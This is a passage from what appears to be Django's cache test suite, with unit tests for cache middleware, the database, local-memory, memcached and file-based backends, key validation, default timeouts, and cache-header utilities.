update_middleware = UpdateCacheMiddleware(get_response)
update_middleware.cache = cache
response = update_middleware(request)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
UpdateCacheMiddleware(lambda req: get_cache_data)(request)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertIsNone(cache.get_or_set('null', None))
if self.supports_get_with_default:
# Previous get_or_set() stores None in the cache.
self.assertIsNone(cache.get('null', 'default'))
else:
self.assertEqual(cache.get('null', 'default'), 'default')
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
self.assertIsNone(cache.get_or_set('null', lambda: None))
if self.supports_get_with_default:
# Previous get_or_set() stores None in the cache.
self.assertIsNone(cache.get('null', 'default'))
else:
self.assertEqual(cache.get('null', 'default'), 'default')
def test_get_or_set_version(self):
msg = "get_or_set() missing 1 required positional argument: 'default'"
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super().setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super().tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_get_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2})
cache.set('expired', 'expired', 0.01)
with self.assertNumQueries(1):
self.assertEqual(cache.get_many(['a', 'b']), {'a': 1, 'b': 2})
time.sleep(0.02)
with self.assertNumQueries(2):
self.assertEqual(cache.get_many(['a', 'b', 'expired']), {'a': 1, 'b': 2})
def test_delete_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2, 'c': 3})
with self.assertNumQueries(1):
cache.delete_many(['a', 'b', 'c'])
def test_cull_count_queries(self):
old_max_entries = cache._max_entries
# Force _cull to delete on first cached record.
cache._max_entries = -1
with CaptureQueriesContext(connection) as captured_queries:
try:
cache.set('force_cull', 'value', 1000)
finally:
cache._max_entries = old_max_entries
num_count_queries = sum('COUNT' in query['sql'] for query in captured_queries)
self.assertEqual(num_count_queries, 1)
def test_delete_cursor_rowcount(self):
"""
The rowcount attribute should not be checked on a closed cursor.
"""
class MockedCursorWrapper(CursorWrapper):
is_closed = False
def close(self):
self.cursor.close()
self.is_closed = True
@property
def rowcount(self):
if self.is_closed:
raise Exception('Cursor is closed.')
return self.cursor.rowcount
cache.set_many({'a': 1, 'b': 2})
with mock.patch('django.db.backends.utils.CursorWrapper', MockedCursorWrapper):
self.assertIs(cache.delete('a'), True)
def test_zero_cull(self):
self._perform_cull_test('zero_cull', 50, 18)
def test_second_call_doesnt_crash(self):
out = io.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = io.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = io.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter:
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
databases = {'default', 'other'}
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable', database='default', verbosity=0)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable', database='other', verbosity=0)
class PicklingSideEffect:
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
self.locked = self.cache._lock.locked()
return {}
limit_locmem_entries = override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
OPTIONS={'MAX_ENTRIES': 9},
))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super().setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
self.assertIs(cache.add('add', bad_obj), True)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
self.assertEqual(cache.incr(key), 2)
self.assertEqual(expire, cache._expire_info[_key])
self.assertEqual(cache.decr(key), 1)
self.assertEqual(expire, cache._expire_info[_key])
@limit_locmem_entries
def test_lru_get(self):
"""get() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
@limit_locmem_entries
def test_lru_set(self):
"""set() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(3, 9):
cache.set(key, key, timeout=None)
cache.set(9, 9, timeout=None)
for key in range(3, 10):
self.assertEqual(cache.get(key), key)
for key in range(3):
self.assertIsNone(cache.get(key))
@limit_locmem_entries
def test_lru_incr(self):
"""incr() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.incr(key), key + 1)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key + 1)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
PyMemcacheCache_params = configured_caches.get('django.core.cache.backends.memcached.PyMemcacheCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
with self.subTest(location=location):
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def _perform_invalid_key_test(self, key, expected_warning):
"""
While other backends merely warn, memcached should raise for an invalid
key.
"""
msg = expected_warning.replace(key, cache.make_key(key))
tests = [
('add', [key, 1]),
('get', [key]),
('set', [key, 1]),
('incr', [key]),
('decr', [key]),
('touch', [key]),
('delete', [key]),
('get_many', [[key, 'b']]),
('set_many', [{key: 1, 'b': 2}]),
('delete_many', [[key, 'b']]),
]
for operation, args in tests:
with self.subTest(operation=operation):
with self.assertRaises(InvalidCacheKey) as cm:
getattr(cache, operation)(*args)
self.assertEqual(str(cm.exception), msg)
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
max_value_length = 2 ** 20
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Most clients (e.g. pymemcache or pylibmc) raise when the value is
# too large. This test is primarily checking that the key was
# deleted, so the return/exception behavior for the set() itself is
# not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._class, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
def test_set_many_returns_failing_keys(self):
def fail_set_multi(mapping, *args, **kwargs):
return mapping.keys()
with mock.patch.object(cache._class, 'set_multi', side_effect=fail_set_multi):
failing_keys = cache.set_many({'key': 'value'})
self.assertEqual(failing_keys, ['key'])
# RemovedInDjango41Warning.
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
@ignore_warnings(category=RemovedInDjango41Warning)
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
base_params = MemcachedCache_params
supports_get_with_default = False
incr_decr_type_error = ValueError
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key in settings.CACHES:
with self.subTest(cache_key=cache_key):
self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'server_max_value_length': 9999},
))
def test_memcached_options(self):
self.assertEqual(cache._cache.server_max_value_length, 9999)
def test_default_used_when_none_is_set(self):
"""
python-memcached doesn't support default in get() so this test
overrides the one in BaseCacheTests.
"""
cache.set('key_default_none', None)
self.assertEqual(cache.get('key_default_none', default='default'), 'default')
class MemcachedCacheDeprecationTests(SimpleTestCase):
def test_warning(self):
from django.core.cache.backends.memcached import MemcachedCache
# Remove warnings filter on MemcachedCache deprecation warning, added
# in runtests.py.
warnings.filterwarnings(
'error',
'MemcachedCache is deprecated',
category=RemovedInDjango41Warning,
)
try:
msg = (
'MemcachedCache is deprecated in favor of PyMemcacheCache and '
'PyLibMCCache.'
)
with self.assertRaisesMessage(RemovedInDjango41Warning, msg):
MemcachedCache('127.0.0.1:11211', {})
finally:
warnings.filterwarnings(
'ignore',
'MemcachedCache is deprecated',
category=RemovedInDjango41Warning,
)
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
# libmemcached manages its own connections.
should_disconnect_on_close = False
@property
def incr_decr_type_error(self):
return cache._lib.ClientError
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
def test_pylibmc_client_servers(self):
backend = self.base_params['BACKEND']
tests = [
('unix:/run/memcached/socket', '/run/memcached/socket'),
('/run/memcached/socket', '/run/memcached/socket'),
('localhost', 'localhost'),
('localhost:11211', 'localhost:11211'),
('[::1]', '[::1]'),
('[::1]:11211', '[::1]:11211'),
('127.0.0.1', '127.0.0.1'),
('127.0.0.1:11211', '127.0.0.1:11211'),
]
for location, expected in tests:
settings = {'default': {'BACKEND': backend, 'LOCATION': location}}
with self.subTest(location), self.settings(CACHES=settings):
self.assertEqual(cache.client_servers, [expected])
@unittest.skipUnless(PyMemcacheCache_params, 'PyMemcacheCache backend not configured')
@override_settings(CACHES=caches_setting_for_tests(
base=PyMemcacheCache_params,
exclude=memcached_excluded_caches,
))
class PyMemcacheCacheTests(BaseMemcachedTests, TestCase):
base_params = PyMemcacheCache_params
@property
def incr_decr_type_error(self):
return cache._lib.exceptions.MemcacheClientError
def test_pymemcache_highest_pickle_version(self):
self.assertEqual(
cache._cache.default_kwargs['serde']._serialize_func.keywords['pickle_version'],
pickle.HIGHEST_PROTOCOL,
)
for cache_key in settings.CACHES:
for client_key, client in caches[cache_key]._cache.clients.items():
with self.subTest(cache_key=cache_key, server=client_key):
self.assertEqual(
client.serde._serialize_func.keywords['pickle_version'],
pickle.HIGHEST_PROTOCOL,
)
@override_settings(CACHES=caches_setting_for_tests(
base=PyMemcacheCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'no_delay': True},
))
def test_pymemcache_options(self):
self.assertIs(cache._cache.default_kwargs['no_delay'], True)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super().setUp()
self.dirname = self.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params['LOCATION'] = self.dirname
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super().tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def mkdtemp(self):
return tempfile.mkdtemp()
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
self.assertTrue(os.path.exists(self.dirname))
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
@skipIf(
sys.platform == 'win32',
'Windows only partially supports umasks and chmod.',
)
def test_cache_dir_permissions(self):
os.rmdir(self.dirname)
dir_path = Path(self.dirname) / 'nested' / 'filebasedcache'
for cache_params in settings.CACHES.values():
cache_params['LOCATION'] = dir_path
setting_changed.send(self.__class__, setting='CACHES', enter=False)
cache.set('foo', 'bar')
self.assertIs(dir_path.exists(), True)
tests = [
dir_path,
dir_path.parent,
dir_path.parent.parent,
]
for directory in tests:
with self.subTest(directory=directory):
dir_mode = directory.stat().st_mode & 0o777
self.assertEqual(dir_mode, 0o700)
def test_get_does_not_ignore_non_filenotfound_exceptions(self):
with mock.patch('builtins.open', side_effect=OSError):
with self.assertRaises(OSError):
cache.get('foo')
def test_empty_cache_file_considered_expired(self):
cache_file = cache._key_to_file('foo')
with open(cache_file, 'wb') as fh:
fh.write(b'')
with open(cache_file, 'rb') as fh:
self.assertIs(cache._is_expired(fh), True)
class FileBasedCachePathLibTests(FileBasedCacheTests):
def mkdtemp(self):
tmp_dir = super().mkdtemp()
return Path(tmp_dir)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_only_initialized(self):
with self.settings(CACHES={
'cache_1': {
'BACKEND': 'cache.closeable_cache.CacheClass',
},
'cache_2': {
'BACKEND': 'cache.closeable_cache.CacheClass',
},
}):
self.assertEqual(caches.all(initialized_only=True), [])
signals.request_finished.send(self.__class__)
self.assertEqual(caches.all(initialized_only=True), [])
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""
Settings having Cache arguments with a TIMEOUT=None create Caches that will
set non-expiring keys.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined in
django.core.cache.backends.base.BaseCache.__init__().
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
host = 'www.example.com'
path = '/cache/test/'
factory = RequestFactory(HTTP_HOST=host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = update_cache if update_cache else True
return request
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('*', ('Accept-Language', 'Cookie'), '*'),
('Accept-Language, Cookie', ('*',), '*'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
response = HttpResponse()
if initial_vary is not None:
response.headers['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response.headers['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response.headers['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# no-cache.
('', {'no_cache': 'Set-Cookie'}, {'no-cache=Set-Cookie'}),
('', {'no-cache': 'Set-Cookie'}, {'no-cache=Set-Cookie'}),
('no-cache=Set-Cookie', {'no_cache': True}, {'no-cache'}),
('no-cache=Set-Cookie,no-cache=Link', {'no_cache': True}, {'no-cache'}),
('no-cache=Set-Cookie', {'no_cache': 'Link'}, {'no-cache=Set-Cookie', 'no-cache=Link'}),
(
'no-cache=Set-Cookie,no-cache=Link',
{'no_cache': 'Custom'},
{'no-cache=Set-Cookie', 'no-cache=Link', 'no-cache=Custom'},
),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
response = HttpResponse()
if initial_cc is not None:
response.headers['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response.headers['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
return UpdateCacheMiddleware(lambda req: HttpResponse(msg))(request)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
